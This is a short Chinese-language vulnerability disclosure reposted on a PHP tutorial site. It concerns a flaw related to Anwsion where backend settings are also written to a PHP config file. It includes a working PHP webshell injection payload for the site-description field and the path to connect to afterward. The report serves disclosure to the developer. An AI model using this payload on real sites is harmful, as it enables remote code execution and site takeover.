来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 漏洞影响 全版本。结合Anwsion 0.7以下所有版本可导致站点被入侵。设计缺陷代码如下 见75-96行 将网站后台配置保存到数据库同时又保存到了本地PHP文件 导致可通过写入一句话执行。/a...
漏洞影响 全版本。 结合Anwsion 0.7以下所有版本可导致站点被入侵。 设计缺陷代码如下 见75-96行 将网站后台配置保存到数据库同时又保存到了本地PHP文件 导致可通过写入一句话执行。 //保存参数到数据库 被写入的配置文件内容如下 system/config/setting.php 访问后台系统设置地址 在网站简介处添加一句话 \';eval($_POST[cmd]);// 话管理工具连接一句话/system/config/setting.php
成功连接一句话文件。
漏洞发布之后将会通知开发者过来认领 避免被恶意利用。 不知为何 在漏洞预览中一句话代码会被添加多一个\ 莫非是防XSS而添加的? |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com